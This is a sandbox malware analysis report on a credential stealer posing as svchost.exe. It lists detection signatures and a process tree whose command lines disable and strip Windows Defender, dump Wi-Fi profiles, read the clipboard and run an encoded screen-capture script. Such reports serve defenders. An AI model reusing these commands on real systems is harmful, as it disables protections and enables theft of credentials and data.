Edit tour
Windows
Analysis Report
svchost.exe
Overview
General Information
| Sample name: | svchost.exe |
| Analysis ID: | 1604599 |
| MD5: | f73648b12faad92f981744f7ad02c06e |
| SHA1: | 8da914dde7483ad54d66dc2a8ec75e28f1437673 |
| SHA256: | 765e63e1c60120f2b2c9f249526049a5312567ab219ba1e22881ebb65c0ce560 |
| Tags: | exeuser-aachum |
| Infos: |   |
 | |
Detection
HackBrowser, Blank Grabber
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Amnesia Stealer
Yara detected Blank Grabber
Yara detected Telegram RAT
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the context of a thread in another process (thread injection)
Queries Google from non browser process on port 80
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Use Short Name Path in Command Line
Steals Internet Explorer cookies
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Classification
- System is w10x64
svchost.exe (PID: 5740 cmdline: "C:\Users\ user\Deskt op\svchost .exe" MD5: F73648B12FAAD92F981744F7AD02C06E) - svchost.exe (PID: 7212 cmdline:
"C:\Users\ user\Deskt op\svchost .exe" MD5: F73648B12FAAD92F981744F7AD02C06E) 
Build.exe (PID: 7324 cmdline: C:\Users\u ser~1\AppD ata\Local\ Temp\_MEI5 7402\Build .exe -pbez nogym MD5: 85C75ACFD4FEAB322F9CCD2E9154433C) 
hacn.exe (PID: 7412 cmdline: "C:\Progra mData\Micr osoft\hacn .exe" MD5: F07FF81C4C60944A81C97D268DD630A2) - hacn.exe (PID: 7508 cmdline:
"C:\Progra mData\Micr osoft\hacn .exe" MD5: F07FF81C4C60944A81C97D268DD630A2) 
cmd.exe (PID: 7532 cmdline: C:\Windows \system32\ cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7540 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - based.exe (PID: 7448 cmdline:
"C:\Progra mData\Micr osoft\base d.exe" MD5: 39B96B128C5732A9EB723DE56187A0E2) - based.exe (PID: 7492 cmdline:
"C:\Progra mData\Micr osoft\base d.exe" MD5: 39B96B128C5732A9EB723DE56187A0E2) - cmd.exe (PID: 7580 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll -Comman d Add-MpPr eference - ExclusionP ath 'C:\Pr ogramData\ Microsoft\ based.exe' " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7600 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7696 cmdline: powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\Prog ramData\Mi crosoft\ba sed.exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7592 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Set-MpP reference -DisableIn trusionPre ventionSys tem $true -DisableIO AVProtecti on $true - DisableRea ltimeMonit oring $tru e -Disable ScriptScan ning $true -EnableCo ntrolledFo lderAccess Disabled -EnableNet workProtec tion Audit Mode -Forc e -MAPSRep orting Dis abled -Sub mitSamples Consent Ne verSend && powershel l Set-MpPr eference - SubmitSamp lesConsent 2 & "%Pro gramFiles% \Windows D efender\Mp CmdRun.exe " -RemoveD efinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7608 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7688 cmdline:
powershell Set-MpPre ference -D isableIntr usionPreve ntionSyste m $true -D isableIOAV Protection $true -Di sableRealt imeMonitor ing $true -DisableSc riptScanni ng $true - EnableCont rolledFold erAccess D isabled -E nableNetwo rkProtecti on AuditMo de -Force -MAPSRepor ting Disab led -Submi tSamplesCo nsent Neve rSend MD5: 04029E121A0CFA5991749937DD22A1D9) 
MpCmdRun.exe (PID: 5688 cmdline: "C:\Progra m Files\Wi ndows Defe nder\MpCmd Run.exe" - RemoveDefi nitions -A ll MD5: B3676839B2EE96983F9ED735CD044159) - cmd.exe (PID: 7928 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7992 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 8068 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 7936 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7960 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 8100 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 8092 cmdline:
C:\Windows \system32\ cmd.exe /c "WMIC /No de:localho st /Namesp ace:\\root \SecurityC enter2 Pat h Antiviru sProduct G et display Name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8156 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
WMIC.exe (PID: 7300 cmdline: WMIC /Node :localhost /Namespac e:\\root\S ecurityCen ter2 Path AntivirusP roduct Get displayNa me MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 1196 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Get-Cli pboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3752 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6092 cmdline:
powershell Get-Clipb oard MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 2120 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2980 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 5740 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 7380 cmdline:
C:\Windows \system32\ cmd.exe /c "netsh wl an show pr ofile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - netsh.exe (PID: 7524 cmdline:
netsh wlan show prof ile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - cmd.exe (PID: 6684 cmdline:
C:\Windows \system32\ cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7344 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tree.com (PID: 7924 cmdline:
tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0) - cmd.exe (PID: 3020 cmdline:
C:\Windows \system32\ cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1748 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tree.com (PID: 2860 cmdline:
tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0) - cmd.exe (PID: 1848 cmdline:
C:\Windows \system32\ cmd.exe /c "systemin fo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3920 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - systeminfo.exe (PID: 2940 cmdline:
systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD) - cmd.exe (PID: 1840 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll.exe -No Profile -E xecutionPo licy Bypas s -Encoded Command JA BzAG8AdQBy AGMAZQAgAD 0AIABAACIA DQAKAHUAcw BpAG4AZwAg AFMAeQBzAH QAZQBtADsA DQAKAHUAcw BpAG4AZwAg AFMAeQBzAH QAZQBtAC4A QwBvAGwAbA BlAGMAdABp AG8AbgBzAC 4ARwBlAG4A ZQByAGkAYw A7AA0ACgB1 AHMAaQBuAG cAIABTAHkA cwB0AGUAbQ AuAEQAcgBh AHcAaQBuAG cAOwANAAoA dQBzAGkAbg BnACAAUwB5 AHMAdABlAG 0ALgBXAGkA bgBkAG8Adw BzAC4ARgBv AHIAbQBzAD sADQAKAA0A CgBwAHUAYg BsAGkAYwAg AGMAbABhAH MAcwAgAFMA YwByAGUAZQ BuAHMAaABv AHQADQAKAH sADQAKACAA IAAgACAAcA B1AGIAbABp AGMAIABzAH QAYQB0AGkA YwAgAEwAaQ BzAHQAPABC AGkAdABtAG EAcAA+ACAA QwBhAHAAdA B1AHIAZQBT AGMAcgBlAG UAbgBzACgA KQANAAoAIA AgACAAIAB7 AA0ACgAgAC AAIAAgACAA IAAgACAAdg BhAHIAIABy AGUAcwB1AG wAdABzACAA PQAgAG4AZQ B3ACAATABp AHMAdAA8AE IAaQB0AG0A YQBwAD4AKA ApADsADQAK ACAAIAAgAC AAIAAgACAA IAB2AGEAcg AgAGEAbABs AFMAYwByAG UAZQBuAHMA IAA9ACAAUw BjAHIAZQBl AG4ALgBBAG wAbABTAGMA cgBlAGUAbg BzADsADQAK AA0ACgAgAC AAIAAgACAA IAAgACAAZg BvAHIAZQBh AGMAaAAgAC gAUwBjAHIA ZQBlAG4AIA BzAGMAcgBl AGUAbgAgAG kAbgAgAGEA bABsAFMAYw ByAGUAZQBu AHMAKQANAA oAIAAgACAA IAAgACAAIA AgAHsADQAK ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgAHQAcgB5 AA0ACgAgAC AAIAAgACAA IAAgACAAIA AgACAAIAB7 AA0ACgAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAF IAZQBjAHQA YQBuAGcAbA BlACAAYgBv AHUAbgBkAH MAIAA9ACAA cwBjAHIAZQ BlAG4ALgBC AG8AdQBuAG QAcwA7AA0A CgAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAHUAcw BpAG4AZwAg ACgAQgBpAH QAbQBhAHAA IABiAGkAdA BtAGEAcAAg AD0AIABuAG UAdwAgAEIA aQB0AG0AYQ BwACgAYgBv AHUAbgBkAH MALgBXAGkA ZAB0AGgALA AgAGIAbwB1 AG4AZABzAC 4ASABlAGkA ZwBoAHQAKQ ApAA0ACgAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg AHsADQAKAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAB1AHMAaQ BuAGcAIAAo AEcAcgBhAH AAaABpAGMA cwAgAGcAcg BhAHAAaABp AGMAcwAgAD 0AIABHAHIA YQBwAGgAaQ BjAHMALgBG AHIAbwBtAE kAbQBhAGcA ZQAoAGIAaQ B0AG0AYQBw ACkAKQANAA oAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAHsADQ AKACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgAGcA cgBhAHAAaA BpAGMAcwAu AEMAbwBwAH kARgByAG8A bQBTAGMAcg BlAGUAbgAo AG4AZQB3AC AAUABvAGkA bgB0ACgAYg BvAHUAbgBk AHMALgBMAG UAZgB0ACwA IABiAG8AdQ BuAGQAcwAu AFQAbwBwAC kALAAgAFAA bwBpAG4AdA AuAEUAbQBw AHQAeQAsAC AAYgBvAHUA bgBkAHMALg BTAGkAegBl ACkAOwANAA oAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAH0ADQ AKAA0ACgAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAcgBlAHMA dQBsAHQAcw AuAEEAZABk ACgAKABCAG kAdABtAGEA cAApAGIAaQ B0AG0AYQBw AC4AQwBsAG 8AbgBlACgA KQApADsADQ AKACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAfQAN AAoAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAfQAN AAoAIAAgAC AAIAAgACAA IAAgACAAIA